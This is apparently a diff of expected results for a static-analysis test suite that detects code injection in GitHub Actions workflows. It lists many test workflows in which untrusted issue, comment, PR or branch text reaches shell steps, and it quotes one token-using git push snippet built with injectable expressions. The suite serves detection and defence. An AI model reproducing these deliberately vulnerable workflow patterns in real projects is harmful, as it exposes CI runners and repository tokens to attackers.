github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | edges | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | @@ -697,170 +864,3 @@ nodes subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | -#select -| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | .github/workflows/test28.yml:12:3:12:21 | pull_request_target | pull_request_target | -| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | .github/workflows/test29.yml:35:18:35:54 | github.event.pull_request.body | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | ${{ inputs.body }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target | -| .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | issues | -| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} 